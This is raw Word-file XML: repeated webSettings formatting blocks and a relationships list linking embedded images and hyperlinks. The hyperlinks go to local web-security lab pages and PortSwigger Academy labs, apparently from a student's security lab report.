      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1691371031">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1715229519">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1751268885">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1760759974">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1779911605">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1784498322">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1803184996">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1813063549">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1905067059">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1915775729">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1940521545">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1529294763">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1614746027">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="73358528">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="208012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80968">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2008745515">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="572619047">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="11894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789620">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1956524193">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1994484764">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2033650631">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2036418352">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2051027062">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2062822750">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2083215976">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2090300269">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2121755544">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="212522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hyperlink" Target="http://localhost:8000" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image181.png"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image219.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image191.png"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image229.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/broken_access_lab_1" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.md5online.org/md5-decrypt.html" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/insecure-design_lab" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/data_exp_lab" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-brute-force-via-password-change" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image182.png"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image201.png"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image220.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/ssrf_lab" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image230.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/a9_lab" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.png"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image173.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image192.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image211.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/ssrf_lab2" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image221.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/access-control/lab-multi-step-process-with-no-access-control-on-one-step" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image183.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image202.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image212.png"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/broken_access_lab_3" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.png"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image174.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image193.png"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image203.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image222.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/insec_des_lab" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.png"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image164.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image184.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image194.png"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image213.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/cryptographic_failure/lab3" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://uit.edu.vn/" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/a9_lab2" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.png"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image175.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image185.png"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image204.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image223.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/ssti/lab" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.png"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.png"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image165.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-response-timing" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image195.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image214.png"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.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2.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.png"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image166.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image186.png"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image205.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image224.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 